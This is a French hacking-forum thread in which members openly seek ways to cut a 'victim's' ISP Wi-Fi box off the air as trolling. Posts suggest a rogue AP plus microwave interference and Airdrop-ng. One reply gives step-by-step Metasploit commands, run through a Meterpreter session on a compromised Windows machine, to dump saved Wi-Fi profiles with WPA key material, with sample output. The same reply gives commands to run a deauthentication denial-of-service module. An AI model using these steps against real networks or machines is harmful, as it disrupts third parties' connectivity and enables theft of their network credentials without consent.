Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 15-08-2012 11:54:57

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Rogue AP, ou faire le troll pour stoper tout trafic sur la box victime

Bonjour smile


Dans le monde des trolls, je cherche un moyen efficace pour downgrader les boxs récentes de nos chers F.A.I sans brouilleurs d'ondes et surtout sans avoir besoin de se pointer avec une masse et taper dessus pam


Les boxs s'améliorent et tant mieux wink je me souviens a mon arrivé sur ce forum que pratiquement toute étaient vulnérables aux attaques par deauth.Aujourd'hui les "aireplay-ng" et compagnie sont mieux supporté par les boitiers et mdk3 commence a faiblir un peu aussi.Du coups pour couper réellement la connexion a la victime reviens a jouer au chat et a la souris en fonction de l'opérateur et de la box.Seul 2 sont toujours aussi nuls, darty et numéricable.Le problème c'est que pour le monde des trolls les livebox, neufbox, bbox, et freebox deviennent un problème.


Perso quand je veux planter ma box j'utilise un faux AP encrypté identique au vrai fait a partir d'un téléphone android couplé a un micro-ondes pour la durée du rogue AP.Ce qui nous fait:

1 Fake ap
2 Un ap brouillant le vrai
3 un micro-ondes


Ç'est très trivial et ça fait beaucoup d'ondes et je crains que la communauté des trolls n'aime pas ça non plus.Si vous avez d'autres solutions, en tant que porte parole trollien je vous écoute big_smile

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 15-08-2012 16:17:28

goliate
Membre Irremplaçable
Inscription : 06-12-2009
Messages : 1 413
Site Web

Re : Rogue AP, ou faire le troll pour stoper tout trafic sur la box victime

Quelle aplication utilise tu sous android?


só deus podem me julgar
719895banniere3.gif
só deus podem me julgar

Hors Ligne

#3 16-08-2012 10:16:39

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : Rogue AP, ou faire le troll pour stoper tout trafic sur la box victime

J'utilise pas d'app, juste le mode android AP proposé dans les paramètres wifi wink

Hors Ligne

#4 16-08-2012 17:36:33

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : Rogue AP, ou faire le troll pour stoper tout trafic sur la box victime

A tout hasard quelqu'un a tester le module wlan_profile de metasploit? j'ai fais une maj de ce dernier et je suis tomber dessus mais j'ai pas de windaube sous la main pour essayer, il y a également le mode wlan_deauth, faudrait comparer par rapport a mdk3 ce que ça vaut vraiment.

Hors Ligne

#5 17-08-2012 00:06:13

Carto_
Membre V.I.P.
Inscription : 16-01-2010
Messages : 206

Re : Rogue AP, ou faire le troll pour stoper tout trafic sur la box victime

Je serais très intéressé aussi par un retour sur ces mods metasploit !


--
Regarde au-delà de ce que tu vois
--

Hors Ligne

#6 17-08-2012 06:03:41

goliate
Membre Irremplaçable
Inscription : 06-12-2009
Messages : 1 413
Site Web

Re : Rogue AP, ou faire le troll pour stoper tout trafic sur la box victime

@Koala pas encor tester, mais je tavoue qua chaque fois je decouvre de nouvelle chosse intéresente avec la R3 quii vient tout juste de sortir.


só deus podem me julgar
719895banniere3.gif
só deus podem me julgar

Hors Ligne

#7 17-08-2012 08:17:46

Fuji
Membre Irremplaçable
Lieu : Saint Script-sur-Shell
Inscription : 13-12-2010
Messages : 783

Re : Rogue AP, ou faire le troll pour stoper tout trafic sur la box victime

On avait déjà parler...

Il y a quatre modules de post-exploitation WIFI mais ils fonctionnent qu'au travers d'une session Meterpreter:

- windows/wlan/wlan_profile
- windows/wlan/wlan_bss_list                                       
- windows/wlan/wlan_current_connection                             
- windows/wlan/wlan_disconnect                                     

- Le premier permet d'extraire toute l'information sur les profils de connexion enregistrés sur la cible, avec les clés WPA hashées et intégrées au sein de balises XML de type <keyMaterial>. L'astuce comme l'a expliqué antares145 serait d'importer directement ces profils et de les rejouer:

Depuis une session Meterpreter tu tapes background pour revenir au handler sans fermer la session:

use post/windows/wlan/wlan_profile
post(wlan_profile) set session 1 <-- tu indiques quelle session ce module doit-être appliqué
post(wlan_profile) exploit

En voici un profil parmi d'autres, j'ai un peux bousiller l'info big_smile

</WLANProfile>
GUID: {c87cd-d2b9-7ce8-bd-7584f27} Description: 802.11n USB Wireless LAN Card State: The interface is connected to a network.
Profile Name: Freebox-XXXX
<?xml version="1.0"?>
<WLANProfile xmlns="http://www.microsoft.com/networking/WLAN/profile/v1">
    <name>Freebox-XXXXX</name>
    <SSIDConfig>
        <SSID>
            <hex>46:72:65:65:62:6f:78:2d:58:58:58:58</hex>
            <name>Freebox-XXXX</name>
        </SSID>
    </SSIDConfig>
    <connectionType>ESS</connectionType>
    <connectionMode>auto</connectionMode>
    <MSM>
        <security>
            <authEncryption>
                <authentication>WPA2PSK</authentication>
                <encryption>AES</encryption>
                <useOneX>false</useOneX>
            </authEncryption>
            <sharedKey>
                <keyType>passPhrase</keyType>
                <protected>true</protected>
                <keyMaterial>01002010D08E9DEF0115D1188C7A0.............</keyMaterial>
            </sharedKey>
        </security>
    </MSM>
</WLANProfile>

- Le deuxième bss_list scan les réseaux aux alentours, et ça ne marche qu'avec une carte interne integrée hmm Pour la manip c'est la même que la précédente sauf que pour sortir de l'ancien module tu tapes back.

- Le troisième current_connection permet d'apporter des infos sur les interfaces WIFI de la cible:

[+] GUID: {23acce7c-dd13-}
Description: Intel(R) Wireless WiFi Link
State: The interface is not connected to any network.
    This interface is not currently connected to a network

[+] GUID: {bb0eb7cb-d3c7-46e5-}
Description: 802.11n USB Wireless LAN Card
State: The interface is connected to a network.
    Mode: A profile is used to make the connection.
    Profile: SFR WiFi Public
    SSID: SFR WiFi Public
    AP MAC: 00:00:00:00:00:00
    BSS Type: Infrastructure
    Physical Type: Extended rate PHY type
    Signal Strength: 37
    RX Rate: 54000
    TX Rate: 54000
    Security Enabled: No
    oneX Enabled: No
    Authentication Algorithm: 802.11 Open
    Cipher Algorithm: None

- Le quatrième wlan_disconnect permet quant à lui de deconnecter la cible.



koala a écrit :

il y a également le mode wlan_deauth

Ça n'existe pas, tu confonds peut-être avec celui là --> dos/wifi/deauth c'est un auxiliary, Il fait le même travail je crois que aireplay-ng -0 :

use auxiliary/dos/wifi/deauth
auxiliary(deauth) > set ADDR_BSS  --> MAC bssid
auxiliary(deauth) > set ADDR_DST  --> MAC station
auxiliary(deauth) > set ADDR_SRC  --> MAC machine d'attaque
auxiliary(deauth) > set num       --> nombre de paquets à envoyer
auxiliary(deauth) > set interface --> l'interface
auxiliary(deauth) > run

Hors Ligne

#8 18-08-2012 12:21:25

Jack Sparrow
Membre Indéboulonnable
Inscription : 04-12-2010
Messages : 101

Re : Rogue AP, ou faire le troll pour stoper tout trafic sur la box victime

Bonjour koala! smile

As-tu essayé Airdrop-ng ?
J'avais réalisé un tuto à propos de cet outil et il était vraiment d'une efficacité redoutable pour empecher une connexion wifi..

Ca fait maintenant un an et je n'ai pas réessayé depuis mais j'espère que ça pourra t'aider wink

Hors Ligne

#9 18-08-2012 18:39:38

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : Rogue AP, ou faire le troll pour stoper tout trafic sur la box victime

Non je l'ai oublier celui la wink je testerai merci smile

Hors Ligne

#10 19-08-2012 15:32:02

Jack Sparrow
Membre Indéboulonnable
Inscription : 04-12-2010
Messages : 101

Re : Rogue AP, ou faire le troll pour stoper tout trafic sur la box victime

mais de rien! wink
tu verras il est très simple d'utilisation et terriblement efficace! J'ai écrit un petit script pour automatiser les choses, n'hésite pas si tu as besoin tu me fais signe.

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.069 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]